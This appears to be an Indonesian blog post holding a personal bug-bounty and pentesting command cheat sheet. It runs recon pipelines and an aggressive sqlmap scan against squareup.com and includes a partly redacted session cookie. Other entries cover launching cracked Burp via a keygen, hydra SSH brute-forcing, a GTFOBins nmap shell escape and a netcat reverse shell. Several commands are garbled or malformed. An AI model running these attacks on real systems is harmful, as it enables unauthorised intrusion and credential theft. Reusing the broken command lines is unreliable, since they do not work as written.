Tuesday, April 13, 2021

Command standar

tasksel ( aplikasi )

ps aux | grep ( melihat service yang jalan )

ntpd -gq ( syncron jam )

ntpdate -v pool.ntp.org ( sinkron waktu zona; nama server yang benar pool.ntp.org, sama seperti di bagian sinkronisasi di bawah )

.*\.squareup\.com$ ( scan scope burp )

 

sebelum memakai parallel, install dulu menggunakan apt install parallel

cat redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null
( scan burp )

buka burp

java -jar (burp-loader-keygen-2_1_07.jar)

ganti versi java di linux

sudo update-alternatives --config java


sinkronisasi date

ntpd -gq

ntpdate -v pool.ntp.org ( syncron dengan server )

ntpda


cari nama domain

cat wilcards | assetfinder --subs-only | anew domains

cari host port 80

cat domains | httprobe -c 80 --prefer-https | anew hosts


cari domain

findomain -f wilcards | tee -a findomain.out

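nmap -sP scan service port /24 ( catatan: -sP adalah ping scan untuk host discovery dan tidak memindai port; di nmap versi baru opsinya -sn )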

nmap -v --script vuln ( scan vuln )



cat from-findomain | anew domains | httprobe -c 50 | anew hosts2



caRI ROOT


cat hosts2 | fff -d 1 -S -o roots



masuk ke directory

find . -type f | nano -


grep -hri host22 | anew
 1650  grep -hri host22 | anew


 grep -hri host23 | anew
 1678  ls
 1679  gf debug-pages
 1680  gf firebase
 1681  gf http-auth
 1682  gf
 1683  gf --help
 1684  gf --list
 1685  gf xss

gf servers
 1689  gf meg-headers


 find . -type f | nano
 1694  find . -type f | nano -
 1695  clear
 1696  gf servers | anew
 1697  gf meg-headers | nano -


waybackurls api.bugcrowd.com | nano -
 1708  curl -vs https://api.bugcrowd.com/robots.txt
 1709  waybackurls --get-versions 'https://api.bugcrowd.com/robots.txt'
 1710  waybackurls --get-versions 'https://api.bugcrowd.com/robots.txt' | fff -S 200 -d 10 -k -o robot-version
 1711  ls
 1712  waybackurls --get-versions 'https://api.bugcrowd.com/robots.txt' | fff -S 200 -d 10 -k -o robot-version

 find . -type f -name *.body | wc
 1731  gf aws-keys


 curl -vs https://api.bugcrowd.com/robots.txt | nano -
 1881  curl -vs https://api.bugcrowd.com/robots.txt


httpx -o httpx.txt


 echo "nama domain" | subfinder -o domain.txt | cat domain.txt | assetfinder --subs-only | tee -a test.txt


cat wilcards cat wilcards | assetfinder --subs-only | anew domains | | httprobe -c 80 --prefer-https


cat wilcards | subfinder -o domain.txt | cat domain.txt | assetfinder --subs-only | anew domains | cat domains | httpx -o aktif

subfinder -d domain | tee

assetfinder --subs-only domain | tee

cat domain(nama domain yang mau di sortir) | sort -u | tee simpan

cat httpx

cat domain | httpx -follow-redirects -status-code -vhost -threads 300 -silent | sort -u | grep "[200]" | cut -d [ -f | sort -u | sed 's/[[:blank:]]*$//' | tee domain


nuclei

sqlmap -u 'https://squareup.com/dashboard/?%27ty%27im!%27#{''''@qw.com'  -technique=BEUSTQ --random-agent --risk 3 --level 5 --crawl 10


'_savt=8b8c3c1b-1f...1588e7a635;_onboard_session=UTRKbzJVVkh...45ba573c53;squareGeo=CH-ZH'

 

tools

ffuf

byp4xx
rapidscan
httpsmuggler / defparam/smuggler
breacher


python3 -c 'ímport pty:pty.spawn("/bin/bash")'

python3 -c 'import pty;pty.spawn("/bin/bash")'

python3 -m http.server


export TERM=xterm



install repo github agar bisa digunakan secara general


go build .
mv  /usr/local/bin/
 
 
sqlmap -r ( untuk burp atau metode post)
sqlmap -m ( untuk link misal dari gf sqli )
 sqlmap -p untuk parameter
sqlmap --force-ssl untuk SSL-nya
Untuk filter tulisan 
 cat scan_aktiftest.txt | cut -d " " -f 4,5,6 | sort -u >> filter.txt



Repo github

1. git init

2. git remote add origin https://github.com/NamaRepo/S.git

git add


git commit -m "first commit"

git push  origin master
echo "# ZIMBRA" >> README.md
git init
git add README.md
git commit -m "first commit"
git branch -M main
git remote add origin https://github.com/x0x0r/ZIMBRA.git
git push -u origin main


tools scan port

https://gitlab.com/pokoyo.bughunter/web-security-bug-hunting-trainings/-/issues/433
https://pypi.org/project/threader3000/
https://github.com/dievus/threader3000

https://github.com/RustScan/RustScan
https://www.youtube.com/watch?v=fGG7BMS-RZI
https://www.geeksforgeeks.org/rustscan-faster-nmap-scanning-with-rust/

https://www.geeksforgeeks.org/vulscan-vulnerability-scanning-with-nmap-in-kali-linux/

Link belajar

https://www.hackingarticles.in/ctf-challenges-walkthrough/

https://www.hackingarticles.in/corrosion-2-vulnhub-walkthrough/

https://www.vulnhub.com/entry/corrosion-2,745/
 
bruteforce
 
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.0.107 ssh  
 
 
Command dasar docker compose dan Dockerfile
 
docker-compose up -d ( buat install )

docker-compose ps -a liat status docker

docker container rm (rmi) ( nama kontainer ) hapus kontainer

docker image prune ( hapus images yang tidak terpakai; untuk image tertentu: docker image rm (nama image) )

docker container ls

docker image ls

docker container exec -it (nama kontainer) /bin/bash

docker container start ( nama kontainer )

select * from users;
https://github.com/Darkness4/dvwa-docker.git
https://github.com/Darkness4/dvwa-docker 

https://github.com/cytopia/docker-dvwa
https://github.com/digininja/DVWA


tools
https://www.bugbountyhunter.com/guides/?type=bugbounty_toolkit

command cari hash
 
echo -n "hash nya" | base64 -d

-d ( decode; base64 itu encoding, bukan hash dan bukan enkripsi, jadi tidak ada kunci dan tidak ada yang di-decrypt )
 
bypass nmap
 TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF
 
https://gtfobins.github.io/gtfobins/nmap/

nc -lnvp

l = listen
n = numeric only ( hanya pakai alamat IP, tanpa resolusi DNS )

v = verbose

p = port

contoh nc -lvnp -s

s = source

nc -e /bin/bash ( ip ) (port)


echo -n ( masukin hash nya ) | base64 -d ( decode string base64; base64 adalah encoding, bukan hash maupun enkripsi )
 
osint
 
https://sploitus.com/ 
https://hunter.how/


web archive cdx api


https://archive.org/developers/wayback-cdx-server.html

https://viewdns.info/


http://web.archive.org/cdx/search/cdx?url=*.api.bugcrowd.com&collapse=urlkey&matchType=prefix 
 
 
 
CVE-2024-4577
